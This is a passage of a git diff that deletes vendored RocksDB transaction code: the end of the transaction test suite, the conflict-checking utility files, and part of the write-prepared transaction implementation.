-  ASSERT_EQ("b0", value);
-}
-
-TEST_P(TransactionTest, DeferSnapshotTest2) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  Transaction* txn1 = db->BeginTransaction(write_options);
-
-  txn1->SetSnapshot();
-
-  s = txn1->Put("A", "a1");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "C", "c0");
-  ASSERT_OK(s);
-  s = db->Put(write_options, "D", "d0");
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-
-  txn1->SetSnapshotOnNextOperation();
-
-  s = txn1->Get(snapshot_read_options, "C", &value);
-  // Snapshot was set before C was written
-  ASSERT_TRUE(s.IsNotFound());
-  s = txn1->Get(snapshot_read_options, "D", &value);
-  // Snapshot was set before D was written
-  ASSERT_TRUE(s.IsNotFound());
-
-  // Snapshot should not have changed yet.
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-
-  s = txn1->Get(snapshot_read_options, "C", &value);
-  // Snapshot was set before C was written
-  ASSERT_TRUE(s.IsNotFound());
-  s = txn1->Get(snapshot_read_options, "D", &value);
-  // Snapshot was set before D was written
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn1->GetForUpdate(read_options, "C", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c0", value);
-
-  s = db->Put(write_options, "D", "d00");
-  ASSERT_OK(s);
-
-  // Snapshot is now set
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  s = txn1->Get(snapshot_read_options, "D", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("d0", value);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-}
-
-TEST_P(TransactionTest, DeferSnapshotSavePointTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  Transaction* txn1 = db->BeginTransaction(write_options);
-
-  txn1->SetSavePoint();  // 1
-
-  s = db->Put(write_options, "T", "1");
-  ASSERT_OK(s);
-
-  txn1->SetSnapshotOnNextOperation();
-
-  s = db->Put(write_options, "T", "2");
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();  // 2
-
-  s = db->Put(write_options, "T", "3");
-  ASSERT_OK(s);
-
-  s = txn1->Put("A", "a");
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();  // 3
-
-  s = db->Put(write_options, "T", "4");
-  ASSERT_OK(s);
-
-  txn1->SetSnapshot();
-  txn1->SetSnapshotOnNextOperation();
-
-  txn1->SetSavePoint();  // 4
-
-  s = db->Put(write_options, "T", "5");
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  s = txn1->Get(snapshot_read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("4", value);
-
-  s = txn1->Put("A", "a1");
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  s = txn1->Get(snapshot_read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("5", value);
-
-  s = txn1->RollbackToSavePoint();  // Rollback to 4
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  s = txn1->Get(snapshot_read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("4", value);
-
-  s = txn1->RollbackToSavePoint();  // Rollback to 3
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  s = txn1->Get(snapshot_read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("3", value);
-
-  s = txn1->Get(read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("5", value);
-
-  s = txn1->RollbackToSavePoint();  // Rollback to 2
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  ASSERT_FALSE(snapshot_read_options.snapshot);
-  s = txn1->Get(snapshot_read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("5", value);
-
-  s = txn1->Delete("A");
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  ASSERT_TRUE(snapshot_read_options.snapshot);
-  s = txn1->Get(snapshot_read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("5", value);
-
-  s = txn1->RollbackToSavePoint();  // Rollback to 1
-  ASSERT_OK(s);
-
-  s = txn1->Delete("A");
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  ASSERT_FALSE(snapshot_read_options.snapshot);
-  s = txn1->Get(snapshot_read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("5", value);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-}
-
-TEST_P(TransactionTest, SetSnapshotOnNextOperationWithNotification) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-
-  class Notifier : public TransactionNotifier {
-   private:
-    const Snapshot** snapshot_ptr_;
-
-   public:
-    explicit Notifier(const Snapshot** snapshot_ptr)
-        : snapshot_ptr_(snapshot_ptr) {}
-
-    void SnapshotCreated(const Snapshot* newSnapshot) {
-      *snapshot_ptr_ = newSnapshot;
-    }
-  };
-
-  std::shared_ptr<Notifier> notifier =
-      std::make_shared<Notifier>(&read_options.snapshot);
-  Status s;
-
-  s = db->Put(write_options, "B", "0");
-  ASSERT_OK(s);
-
-  Transaction* txn1 = db->BeginTransaction(write_options);
-
-  txn1->SetSnapshotOnNextOperation(notifier);
-  ASSERT_FALSE(read_options.snapshot);
-
-  s = db->Put(write_options, "B", "1");
-  ASSERT_OK(s);
-
-  // A Get does not generate the snapshot
-  s = txn1->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_FALSE(read_options.snapshot);
-  ASSERT_EQ(value, "1");
-
-  // Any other operation does
-  s = txn1->Put("A", "0");
-  ASSERT_OK(s);
-
-  // Now change "B".
-  s = db->Put(write_options, "B", "2");
-  ASSERT_OK(s);
-
-  // The original value should still be read
-  s = txn1->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_TRUE(read_options.snapshot);
-  ASSERT_EQ(value, "1");
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-}
-
-TEST_P(TransactionTest, ClearSnapshotTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  s = db->Put(write_options, "foo", "0");
-  ASSERT_OK(s);
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = db->Put(write_options, "foo", "1");
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-  ASSERT_FALSE(snapshot_read_options.snapshot);
-
-  // No snapshot created yet
-  s = txn->Get(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "1");
-
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-  ASSERT_TRUE(snapshot_read_options.snapshot);
-
-  s = db->Put(write_options, "foo", "2");
-  ASSERT_OK(s);
-
-  // Snapshot was created before change to '2'
-  s = txn->Get(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "1");
-
-  txn->ClearSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-  ASSERT_FALSE(snapshot_read_options.snapshot);
-
-  // Snapshot has now been cleared
-  s = txn->Get(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "2");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, ToggleAutoCompactionTest) {
-  Status s;
-
-  TransactionOptions txn_options;
-  ColumnFamilyHandle *cfa, *cfb;
-  ColumnFamilyOptions cf_options;
-
-  // Create 2 new column families
-  s = db->CreateColumnFamily(cf_options, "CFA", &cfa);
-  ASSERT_OK(s);
-  s = db->CreateColumnFamily(cf_options, "CFB", &cfb);
-  ASSERT_OK(s);
-
-  delete cfa;
-  delete cfb;
-  delete db;
-
-  // open DB with three column families
-  std::vector<ColumnFamilyDescriptor> column_families;
-  // have to open default column family
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, ColumnFamilyOptions()));
-  // open the new column families
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFA", ColumnFamilyOptions()));
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFB", ColumnFamilyOptions()));
-
-  ColumnFamilyOptions* cf_opt_default = &column_families[0].options;
-  ColumnFamilyOptions* cf_opt_cfa = &column_families[1].options;
-  ColumnFamilyOptions* cf_opt_cfb = &column_families[2].options;
-  cf_opt_default->disable_auto_compactions = false;
-  cf_opt_cfa->disable_auto_compactions = true;
-  cf_opt_cfb->disable_auto_compactions = false;
-
-  std::vector<ColumnFamilyHandle*> handles;
-
-  s = TransactionDB::Open(options, txn_db_options, dbname, column_families,
-                          &handles, &db);
-  ASSERT_OK(s);
-
-  auto cfh_default = reinterpret_cast<ColumnFamilyHandleImpl*>(handles[0]);
-  auto opt_default = *cfh_default->cfd()->GetLatestMutableCFOptions();
-
-  auto cfh_a = reinterpret_cast<ColumnFamilyHandleImpl*>(handles[1]);
-  auto opt_a = *cfh_a->cfd()->GetLatestMutableCFOptions();
-
-  auto cfh_b = reinterpret_cast<ColumnFamilyHandleImpl*>(handles[2]);
-  auto opt_b = *cfh_b->cfd()->GetLatestMutableCFOptions();
-
-  ASSERT_EQ(opt_default.disable_auto_compactions, false);
-  ASSERT_EQ(opt_a.disable_auto_compactions, true);
-  ASSERT_EQ(opt_b.disable_auto_compactions, false);
-
-  for (auto handle : handles) {
-    delete handle;
-  }
-}
-
-TEST_P(TransactionTest, ExpiredTransactionDataRace1) {
-  // In this test, txn1 should succeed committing,
-  // as the callback is called after txn1 starts committing.
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"TransactionTest::ExpirableTransactionDataRace:1"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "TransactionTest::ExpirableTransactionDataRace:1", [&](void* arg) {
-        WriteOptions write_options;
-        TransactionOptions txn_options;
-
-        // Force txn1 to expire
-        /* sleep override */
-        std::this_thread::sleep_for(std::chrono::milliseconds(150));
-
-        Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-        Status s;
-        s = txn2->Put("X", "2");
-        ASSERT_TRUE(s.IsTimedOut());
-        s = txn2->Commit();
-        ASSERT_OK(s);
-        delete txn2;
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  WriteOptions write_options;
-  TransactionOptions txn_options;
-
-  txn_options.expiration = 100;
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-
-  Status s;
-  s = txn1->Put("X", "1");
-  ASSERT_OK(s);
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  ReadOptions read_options;
-  string value;
-  s = db->Get(read_options, "X", &value);
-  ASSERT_EQ("1", value);
-
-  delete txn1;
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-namespace {
-Status TransactionStressTestInserter(TransactionDB* db,
-                                     const size_t num_transactions,
-                                     const size_t num_sets,
-                                     const size_t num_keys_per_set) {
-  size_t seed = std::hash<std::thread::id>()(std::this_thread::get_id());
-  Random64 _rand(seed);
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  txn_options.set_snapshot = true;
-
-  RandomTransactionInserter inserter(&_rand, write_options, read_options,
-                                     num_keys_per_set,
-                                     static_cast<uint16_t>(num_sets));
-
-  for (size_t t = 0; t < num_transactions; t++) {
-    bool success = inserter.TransactionDBInsert(db, txn_options);
-    if (!success) {
-      // unexpected failure
-      return inserter.GetLastStatus();
-    }
-  }
-
-  // Make sure at least some of the transactions succeeded.  It's ok if
-  // some failed due to write-conflicts.
-  if (inserter.GetFailureCount() > num_transactions / 2) {
-    return Status::TryAgain("Too many transactions failed! " +
-                            std::to_string(inserter.GetFailureCount()) + " / " +
-                            std::to_string(num_transactions));
-  }
-
-  return Status::OK();
-}
-}  // namespace
-
-TEST_P(MySQLStyleTransactionTest, TransactionStressTest) {
-  const size_t num_threads = 4;
-  const size_t num_transactions_per_thread = 10000;
-  const size_t num_sets = 3;
-  const size_t num_keys_per_set = 100;
-  // Setting the key-space to be 100 keys should cause enough write-conflicts
-  // to make this test interesting.
-
-  std::vector<port::Thread> threads;
-
-  std::function<void()> call_inserter = [&] {
-    ASSERT_OK(TransactionStressTestInserter(db, num_transactions_per_thread,
-                                            num_sets, num_keys_per_set));
-  };
-
-  // Create N threads that use RandomTransactionInserter to write
-  // many transactions.
-  for (uint32_t i = 0; i < num_threads; i++) {
-    threads.emplace_back(call_inserter);
-  }
-
-  // Wait for all threads to run
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  // Verify that data is consistent
-  Status s = RandomTransactionInserter::Verify(db, num_sets);
-  ASSERT_OK(s);
-}
-
-TEST_P(TransactionTest, MemoryLimitTest) {
-  TransactionOptions txn_options;
-  // Header (12 bytes) + NOOP (1 byte) + 2 * 8 bytes for data.
-  txn_options.max_write_batch_size = 29;
-  string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(WriteOptions(), txn_options);
-  ASSERT_TRUE(txn);
-
-  ASSERT_EQ(0, txn->GetNumPuts());
-  ASSERT_LE(0, txn->GetID());
-
-  s = txn->Put(Slice("a"), Slice("...."));
-  ASSERT_OK(s);
-  ASSERT_EQ(1, txn->GetNumPuts());
-
-  s = txn->Put(Slice("b"), Slice("...."));
-  ASSERT_OK(s);
-  ASSERT_EQ(2, txn->GetNumPuts());
-
-  s = txn->Put(Slice("b"), Slice("...."));
-  ASSERT_TRUE(s.IsMemoryLimit());
-  ASSERT_EQ(2, txn->GetNumPuts());
-
-  txn->Rollback();
-  delete txn;
-}
-
-// Test WritePreparedTxnDB's IsInSnapshot against different ordering of
-// snapshot, max_committed_seq_, prepared, and commit entries.
-TEST_P(WritePreparedTransactionTest, IsInSnapshotTest) {
-  WriteOptions wo;
-  // Use small commit cache to trigger lots of eviction and fast advance of
-  // max_evicted_seq_
-  // will take effect after ReOpen
-  WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE = 8;
-  // Same for snapshot cache size
-  WritePreparedTxnDB::DEF_SNAPSHOT_CACHE_SIZE = 5;
-
-  // Take some preliminary snapshots first. This is to stress the data structure
-  // that holds the old snapshots as it will be designed to be efficient when
-  // only a few snapshots are below the max_evicted_seq_.
-  for (int max_snapshots = 1; max_snapshots < 20; max_snapshots++) {
-    // Leave some gap between the preliminary snapshots and the final snapshot
-    // that we check. This should test for also different overlapping scnearios
-    // between the last snapshot and the commits.
-    for (int max_gap = 1; max_gap < 10; max_gap++) {
-      // Since we do not actually write to db, we mock the seq as it would be
-      // increaased by the db. The only exception is that we need db seq to
-      // advance for our snapshots. for which we apply a dummy put each time we
-      // increase our mock of seq.
-      uint64_t seq = 0;
-      // At each step we prepare a txn and then we commit it in the next txn.
-      // This emulates the consecuitive transactions that write to the same key
-      uint64_t cur_txn = 0;
-      // Number of snapshots taken so far
-      int num_snapshots = 0;
-      std::vector<const Snapshot*> to_be_released;
-      // Number of gaps applied so far
-      int gap_cnt = 0;
-      // The final snapshot that we will inspect
-      uint64_t snapshot = 0;
-      bool found_committed = false;
-      // To stress the data structure that maintain prepared txns, at each cycle
-      // we add a new prepare txn. These do not mean to be committed for
-      // snapshot inspection.
-      std::set<uint64_t> prepared;
-      // We keep the list of txns comitted before we take the last snaphot.
-      // These should be the only seq numbers that will be found in the snapshot
-      std::set<uint64_t> committed_before;
-      ReOpen();  // to restart the db
-      WritePreparedTxnDB* wp_db = dynamic_cast<WritePreparedTxnDB*>(db);
-      assert(wp_db);
-      assert(wp_db->db_impl_);
-      // We continue until max advances a bit beyond the snapshot.
-      while (!snapshot || wp_db->max_evicted_seq_ < snapshot + 100) {
-        // do prepare for a transaction
-        wp_db->db_impl_->Put(wo, "key", "value");  // dummy put to inc db seq
-        seq++;
-        ASSERT_EQ(wp_db->db_impl_->GetLatestSequenceNumber(), seq);
-        wp_db->AddPrepared(seq);
-        prepared.insert(seq);
-
-        // If cur_txn is not started, do prepare for it.
-        if (!cur_txn) {
-          wp_db->db_impl_->Put(wo, "key", "value");  // dummy put to inc db seq
-          seq++;
-          ASSERT_EQ(wp_db->db_impl_->GetLatestSequenceNumber(), seq);
-          cur_txn = seq;
-          wp_db->AddPrepared(cur_txn);
-        } else {                                     // else commit it
-          wp_db->db_impl_->Put(wo, "key", "value");  // dummy put to inc db seq
-          seq++;
-          ASSERT_EQ(wp_db->db_impl_->GetLatestSequenceNumber(), seq);
-          wp_db->AddCommitted(cur_txn, seq);
-          if (!snapshot) {
-            committed_before.insert(cur_txn);
-          }
-          cur_txn = 0;
-        }
-
-        if (num_snapshots < max_snapshots - 1) {
-          // Take preliminary snapshots
-          auto tmp_snapshot = db->GetSnapshot();
-          to_be_released.push_back(tmp_snapshot);
-          num_snapshots++;
-        } else if (gap_cnt < max_gap) {
-          // Wait for some gap before taking the final snapshot
-          gap_cnt++;
-        } else if (!snapshot) {
-          // Take the final snapshot if it is not already taken
-          auto tmp_snapshot = db->GetSnapshot();
-          to_be_released.push_back(tmp_snapshot);
-          snapshot = tmp_snapshot->GetSequenceNumber();
-          // We increase the db seq artificailly by a dummy Put. Check that this
-          // technique is effective and db seq is that same as ours.
-          ASSERT_EQ(snapshot, seq);
-          num_snapshots++;
-        }
-
-        // If the snapshot is taken, verify seq numbers visible to it. We redo
-        // it at each cycle to test that the system is still sound when
-        // max_evicted_seq_ advances.
-        if (snapshot) {
-          for (uint64_t s = 0; s <= seq; s++) {
-            bool was_committed =
-                (committed_before.find(s) != committed_before.end());
-            bool is_in_snapshot = wp_db->IsInSnapshot(s, snapshot);
-            if (was_committed != is_in_snapshot) {
-              printf("max_snapshots %d max_gap %d seq %" PRIu64 " max %" PRIu64
-                     " snapshot %" PRIu64
-                     " gap_cnt %d num_snapshots %d s %" PRIu64 "\n",
-                     max_snapshots, max_gap, seq,
-                     wp_db->max_evicted_seq_.load(), snapshot, gap_cnt,
-                     num_snapshots, s);
-            }
-            ASSERT_EQ(was_committed, is_in_snapshot);
-            found_committed = found_committed || is_in_snapshot;
-          }
-        }
-      }
-      // Safety check to make sure the test actually ran
-      ASSERT_TRUE(found_committed);
-      // As an extra check, check if prepared set will be properly empty after
-      // they are committed.
-      if (cur_txn) {
-        wp_db->AddCommitted(cur_txn, seq);
-      }
-      for (auto p : prepared) {
-        wp_db->AddCommitted(p, seq);
-      }
-      ASSERT_TRUE(wp_db->delayed_prepared_.empty());
-      ASSERT_TRUE(wp_db->prepared_txns_.empty());
-      for (auto s : to_be_released) {
-        db->ReleaseSnapshot(s);
-      }
-    }
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as Transactions are not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_util.cc b/thirdparty/rocksdb/utilities/transactions/transaction_util.cc
deleted file mode 100644
index ad03a94..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_util.cc
+++ /dev/null
@@ -1,162 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "utilities/transactions/transaction_util.h"
-
-#include <inttypes.h>
-#include <string>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-Status TransactionUtil::CheckKeyForConflicts(DBImpl* db_impl,
-                                             ColumnFamilyHandle* column_family,
-                                             const std::string& key,
-                                             SequenceNumber key_seq,
-                                             bool cache_only) {
-  Status result;
-
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  SuperVersion* sv = db_impl->GetAndRefSuperVersion(cfd);
-
-  if (sv == nullptr) {
-    result = Status::InvalidArgument("Could not access column family " +
-                                     cfh->GetName());
-  }
-
-  if (result.ok()) {
-    SequenceNumber earliest_seq =
-        db_impl->GetEarliestMemTableSequenceNumber(sv, true);
-
-    result = CheckKey(db_impl, sv, earliest_seq, key_seq, key, cache_only);
-
-    db_impl->ReturnAndCleanupSuperVersion(cfd, sv);
-  }
-
-  return result;
-}
-
-Status TransactionUtil::CheckKey(DBImpl* db_impl, SuperVersion* sv,
-                                 SequenceNumber earliest_seq,
-                                 SequenceNumber key_seq, const std::string& key,
-                                 bool cache_only) {
-  Status result;
-  bool need_to_read_sst = false;
-
-  // Since it would be too slow to check the SST files, we will only use
-  // the memtables to check whether there have been any recent writes
-  // to this key after it was accessed in this transaction.  But if the
-  // Memtables do not contain a long enough history, we must fail the
-  // transaction.
-  if (earliest_seq == kMaxSequenceNumber) {
-    // The age of this memtable is unknown.  Cannot rely on it to check
-    // for recent writes.  This error shouldn't happen often in practice as
-    // the Memtable should have a valid earliest sequence number except in some
-    // corner cases (such as error cases during recovery).
-    need_to_read_sst = true;
-
-    if (cache_only) {
-      result = Status::TryAgain(
-          "Transaction ould not check for conflicts as the MemTable does not "
-          "countain a long enough history to check write at SequenceNumber: ",
-          ToString(key_seq));
-    }
-  } else if (key_seq < earliest_seq) {
-    need_to_read_sst = true;
-
-    if (cache_only) {
-      // The age of this memtable is too new to use to check for recent
-      // writes.
-      char msg[300];
-      snprintf(msg, sizeof(msg),
-               "Transaction could not check for conflicts for operation at "
-               "SequenceNumber %" PRIu64
-               " as the MemTable only contains changes newer than "
-               "SequenceNumber %" PRIu64
-               ".  Increasing the value of the "
-               "max_write_buffer_number_to_maintain option could reduce the "
-               "frequency "
-               "of this error.",
-               key_seq, earliest_seq);
-      result = Status::TryAgain(msg);
-    }
-  }
-
-  if (result.ok()) {
-    SequenceNumber seq = kMaxSequenceNumber;
-    bool found_record_for_key = false;
-
-    Status s = db_impl->GetLatestSequenceForKey(sv, key, !need_to_read_sst,
-                                                &seq, &found_record_for_key);
-
-    if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) {
-      result = s;
-    } else if (found_record_for_key && (seq > key_seq)) {
-      // Write Conflict
-      result = Status::Busy();
-    }
-  }
-
-  return result;
-}
-
-Status TransactionUtil::CheckKeysForConflicts(DBImpl* db_impl,
-                                              const TransactionKeyMap& key_map,
-                                              bool cache_only) {
-  Status result;
-
-  for (auto& key_map_iter : key_map) {
-    uint32_t cf_id = key_map_iter.first;
-    const auto& keys = key_map_iter.second;
-
-    SuperVersion* sv = db_impl->GetAndRefSuperVersion(cf_id);
-    if (sv == nullptr) {
-      result = Status::InvalidArgument("Could not access column family " +
-                                       ToString(cf_id));
-      break;
-    }
-
-    SequenceNumber earliest_seq =
-        db_impl->GetEarliestMemTableSequenceNumber(sv, true);
-
-    // For each of the keys in this transaction, check to see if someone has
-    // written to this key since the start of the transaction.
-    for (const auto& key_iter : keys) {
-      const auto& key = key_iter.first;
-      const SequenceNumber key_seq = key_iter.second.seq;
-
-      result = CheckKey(db_impl, sv, earliest_seq, key_seq, key, cache_only);
-
-      if (!result.ok()) {
-        break;
-      }
-    }
-
-    db_impl->ReturnAndCleanupSuperVersion(cf_id, sv);
-
-    if (!result.ok()) {
-      break;
-    }
-  }
-
-  return result;
-}
-
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_util.h b/thirdparty/rocksdb/utilities/transactions/transaction_util.h
deleted file mode 100644
index 5c6b8fa..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_util.h
+++ /dev/null
@@ -1,78 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <unordered_map>
-
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-
-struct TransactionKeyMapInfo {
-  // Earliest sequence number that is relevant to this transaction for this key
-  SequenceNumber seq;
-
-  uint32_t num_writes;
-  uint32_t num_reads;
-
-  bool exclusive;
-
-  explicit TransactionKeyMapInfo(SequenceNumber seq_no)
-      : seq(seq_no), num_writes(0), num_reads(0), exclusive(false) {}
-};
-
-using TransactionKeyMap =
-    std::unordered_map<uint32_t,
-                       std::unordered_map<std::string, TransactionKeyMapInfo>>;
-
-class DBImpl;
-struct SuperVersion;
-class WriteBatchWithIndex;
-
-class TransactionUtil {
- public:
-  // Verifies there have been no writes to this key in the db since this
-  // sequence number.
-  //
-  // If cache_only is true, then this function will not attempt to read any
-  // SST files.  This will make it more likely this function will
-  // return an error if it is unable to determine if there are any conflicts.
-  //
-  // Returns OK on success, BUSY if there is a conflicting write, or other error
-  // status for any unexpected errors.
-  static Status CheckKeyForConflicts(DBImpl* db_impl,
-                                     ColumnFamilyHandle* column_family,
-                                     const std::string& key,
-                                     SequenceNumber key_seq, bool cache_only);
-
-  // For each key,SequenceNumber pair in the TransactionKeyMap, this function
-  // will verify there have been no writes to the key in the db since that
-  // sequence number.
-  //
-  // Returns OK on success, BUSY if there is a conflicting write, or other error
-  // status for any unexpected errors.
-  //
-  // REQUIRED: this function should only be called on the write thread or if the
-  // mutex is held.
-  static Status CheckKeysForConflicts(DBImpl* db_impl,
-                                      const TransactionKeyMap& keys,
-                                      bool cache_only);
-
- private:
-  static Status CheckKey(DBImpl* db_impl, SuperVersion* sv,
-                         SequenceNumber earliest_seq, SequenceNumber key_seq,
-                         const std::string& key, bool cache_only);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/write_prepared_txn.cc b/thirdparty/rocksdb/utilities/transactions/write_prepared_txn.cc
deleted file mode 100644
index 211e217..0000000
--- a/thirdparty/rocksdb/utilities/transactions/write_prepared_txn.cc
+++ /dev/null
@@ -1,88 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/transactions/write_prepared_txn.h"
-
-#include <map>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "utilities/transactions/pessimistic_transaction.h"
-#include "utilities/transactions/pessimistic_transaction_db.h"
-
-namespace rocksdb {
-
-struct WriteOptions;
-
-WritePreparedTxn::WritePreparedTxn(WritePreparedTxnDB* txn_db,
-                                   const WriteOptions& write_options,
-                                   const TransactionOptions& txn_options)
-    : PessimisticTransaction(txn_db, write_options, txn_options),
-      wpt_db_(txn_db) {
-  PessimisticTransaction::Initialize(txn_options);
-}
-
-Status WritePreparedTxn::CommitBatch(WriteBatch* /* unused */) {
-  // TODO(myabandeh) Implement this
-  throw std::runtime_error("CommitBatch not Implemented");
-  return Status::OK();
-}
-
-Status WritePreparedTxn::PrepareInternal() {
-  WriteOptions write_options = write_options_;
-  write_options.disableWAL = false;
-  WriteBatchInternal::MarkEndPrepare(GetWriteBatch()->GetWriteBatch(), name_);
-  const bool disable_memtable = true;
-  uint64_t seq_used;
-  Status s =
-      db_impl_->WriteImpl(write_options, GetWriteBatch()->GetWriteBatch(),
-                          /*callback*/ nullptr, &log_number_, /*log ref*/ 0,
-                          !disable_memtable, &seq_used);
-  prepare_seq_ = seq_used;
-  wpt_db_->AddPrepared(prepare_seq_);
-  return s;
-}
-
-Status WritePreparedTxn::CommitWithoutPrepareInternal() {
-  // TODO(myabandeh) Implement this
-  throw std::runtime_error("Commit not Implemented");
-  return Status::OK();
-}
-
-Status WritePreparedTxn::CommitInternal() {
-  // We take the commit-time batch and append the Commit marker.
-  // The Memtable will ignore the Commit marker in non-recovery mode
-  WriteBatch* working_batch = GetCommitTimeWriteBatch();
-  // TODO(myabandeh): prevent the users from writing to txn after the prepare
-  // phase
-  assert(working_batch->Count() == 0);
-  WriteBatchInternal::MarkCommit(working_batch, name_);
-
-  // any operations appended to this working_batch will be ignored from WAL
-  working_batch->MarkWalTerminationPoint();
-
-  const bool disable_memtable = true;
-  uint64_t seq_used;
-  auto s = db_impl_->WriteImpl(write_options_, working_batch, nullptr, nullptr,
-                               log_number_, disable_memtable, &seq_used);
-  uint64_t& commit_seq = seq_used;
-  wpt_db_->AddCommitted(prepare_seq_, commit_seq);
-  return s;
-}
-
-Status WritePreparedTxn::Rollback() {
-  // TODO(myabandeh) Implement this
-  throw std::runtime_error("Rollback not Implemented");
-  return Status::OK();
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/write_prepared_txn.h b/thirdparty/rocksdb/utilities/transactions/write_prepared_txn.h
deleted file mode 100644
index b7cc6ba..0000000
--- a/thirdparty/rocksdb/utilities/transactions/write_prepared_txn.h
+++ /dev/null
